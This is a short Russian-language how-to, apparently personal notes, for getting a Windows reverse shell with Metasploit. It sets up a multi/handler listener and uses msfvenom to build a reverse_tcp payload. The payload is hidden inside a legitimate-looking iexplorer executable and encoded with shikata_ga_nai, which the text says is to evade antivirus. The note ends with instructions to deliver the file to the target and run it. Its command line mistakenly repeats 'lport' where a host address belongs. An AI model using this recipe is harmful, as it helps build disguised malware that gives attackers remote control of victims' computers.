# Reverse shell через MSFConsloe 1. Создать исполняемый shell Создаем сервер для приема подключений ```bash= msfconsole use exploit/multi/handler set payload windows/shell/reverse_tcp ``` Создаем исполняемый файл замаскировать его под неподозрительный файл, и закодировать от ообнаружения антивирусами ```bash= msfvenom -p windows/shell/reverse_tcp -e x86 -x iexplorer_good.exe -k -f exe -o iexplorer.exe -e x86/shikata_ga_nai lport=192.168.1.106 lport=4444 ``` 2. Передать файл на атакуемый хост, запустить файл